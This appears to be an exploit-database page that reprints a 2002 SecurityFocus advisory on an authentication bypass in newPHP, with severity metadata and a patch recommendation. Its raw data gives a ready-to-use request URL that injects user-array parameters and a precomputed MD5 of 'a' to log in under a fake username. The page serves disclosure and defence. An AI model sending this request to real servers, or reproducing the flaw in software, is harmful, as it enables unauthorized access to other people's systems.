header-logo
Suggest Exploit
vendor:
newPHP
by:
SecurityFocus
4.3
CVSS
MEDIUM
Improper Verification of Authentication Credentials
287
CWE
Product Name: newPHP
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

newPHP Improper Verification of Authentication Credentials Vulnerability

A vulnerability is reported to exist in newPHP that may allow an attacker to gain access to a vulnerable host due to improper verification of authentication credentials. This issue may be exploited to gain access to sensitive data or perform other unauthorized actions. An attacker can send a malicious request to the vulnerable host with a fake username and a password of 'a', followed by a MD5 hash of '0cc175b9c0f1b6a831c399e269772661' and a value of '5' for the user index.

Mitigation:

The vendor has released a patch to address this issue. It is recommended that users upgrade to the latest version of newPHP.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8489/info

A vulnerability is reported to exist in newPHP that may allow an attacker to gain access to a vulnerable host due to improper verification of authentication credentials.

This issue may be exploited to gain access to sensitive data or perform other unauthorized actions. 

http://[host]/nphp/?[action here, example: output]&
pword=a&
uname=[fake usernamehere]&
nphp_users[user index here][0]=a&
nphp_users[user index here][1]=0cc175b9c0f1b6a831c399e269772661&
nphp_users[user index here][3]=5

Navigation

Suggest Exploit

Services By CQR